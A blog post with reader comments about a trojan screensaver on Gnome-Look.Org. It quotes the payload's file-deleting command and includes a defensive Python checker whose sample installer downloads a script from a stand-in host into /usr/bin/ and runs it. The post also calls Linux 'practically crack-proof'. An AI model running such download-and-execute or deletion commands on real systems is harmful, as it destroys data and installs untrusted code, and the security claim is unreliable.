Linux Trojan Discovered in Screensaver

So, there was a trojan-infected screensaver uploaded to Gnome-Look.Org (recently removed) that used wget to place a bash script in /usr/bin/ and then executed it. Originally the script’s contents were a ping command, but this was later changed to: rm -f ./*.*

What does this tell us about Linux security? In fact what does this
tell us about any computer operating system’s security?

Right, it tells us that it means absolutely nothing if a stupid user
is prepared to sacrifice his/her security to get something pretty and
fluffy from an untrusted 3rd party web site.

The main security for Linux, apart from being practically crack-proof,
is the fact that we get our applications and goodies from verified
secure repositories. That is now history thanks to the Windows mentality
that is infecting the minds of the usually security-conscious Linux

It’s fate. It was bound to happen sooner or later thanks to Linux’s
popularity over the last couple of years. Along with it came the 3rd
party apps and goodies sites which generally offer the same stuff which is
available in most distro repos.

My message? Only trust verified Linux distro repos and stay away from these
3rd party sites which are lacking the staff/time to check each upload before
making it available to the general populace.
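
The behaviour described at the top of this post (wget drops a script into /usr/bin/, then the script is run) can be spotted by reading an installer before handing it root. The following is an added example, not part of the original post and not the trojan's actual code: a small Python check that flags that pattern in an installer script. The sample script, the example.invalid URL and the helper.sh name are constructed for illustration.

```python
import re
import shlex

# Root-owned directories on the default PATH.
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/local/bin/", "/bin/", "/sbin/")
# Output-file options per download tool (also matches bundled forms like -qO).
OUTPUT_OPT = {"wget": r"-\w*O|--output-document", "curl": r"-\w*o|--output"}

# Constructed sample installer script, modelled on the behaviour described above.
SAMPLE = """#!/bin/sh
cp screensaver.desktop /usr/share/applications/screensavers/
wget -q http://example.invalid/helper.sh -O /usr/bin/helper.sh
chmod +x /usr/bin/helper.sh
/usr/bin/helper.sh &
"""

def fetched_path(tokens):
    """Return the file a wget/curl command line writes to, or None."""
    if tokens[0] not in OUTPUT_OPT:
        return None
    for i, tok in enumerate(tokens[:-1]):
        if re.fullmatch(OUTPUT_OPT[tokens[0]], tok):
            return tokens[i + 1]
    return None

def audit(script_text):
    """Return (line_number, reason) findings for one installer script."""
    findings, downloaded = [], set()
    for no, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.search(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b", line):
            findings.append((no, "download piped into a shell"))
        try:
            tokens = shlex.split(line)
        except ValueError:  # unbalanced quotes: leave for manual review
            continue
        tokens = tokens[1:] if tokens[:1] == ["sudo"] else tokens
        if not tokens:
            continue
        path = fetched_path(tokens)
        # The file being run: "sh FILE" / "bash FILE", or the command itself.
        runs = tokens[1] if tokens[0] in ("sh", "bash") and len(tokens) > 1 else tokens[0]
        if path:
            downloaded.add(path)
            if path.startswith(SYSTEM_DIRS):
                findings.append((no, "download written to system path " + path))
        elif runs in downloaded:
            findings.append((no, "executes downloaded file " + runs))
    return findings
```

Calling audit(SAMPLE) reports the wget line and the line that runs the fetched file. It is a line-by-line heuristic, so an empty result does not mean a script is safe.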


2 thoughts on “Linux Trojan Discovered in Screensaver”

  1. Geeze! You're right, it was bound to happen, now comes the “virus checkers”, “malware checkers” et al. I guess the same type of thing could be done to MAC OS X, time will tell.

    But isn't /usr/bin/ “root” only? I've never used any screensaver other than what comes with a distro, does one need sudo to install one?

    DUMB QUESTION!!!! – Of course one does.

    Scary stuff this, and really BAD news for Gnome-Look, Xfce-Look, Kde-Look or sites that are full of nice stuff.

    Have a nice day.

  2. Found this ( )
    Anti-Virus will Never be needed on Linux because other measures are being undertaken

    As I said with each new distro release, AppArmor and SELinux policies are being distributed confining the avenues for attack from malware including the ability to send mail, use network resources, and various other policies…there will be no need for Anti-virus

    as you will have DACL followed by MACL protecting the system..everything will be well confined, and Av will be a dinosaur….you can't get owned if access isn't granted…..
    It amazes me that people can be so “exact” with their statements of “never”, “can't” et al.

    “If man can build it, man can destroy it.” – that goes for anything from toothpicks to space stations, computer programs and OS's are somewhere in between the two.

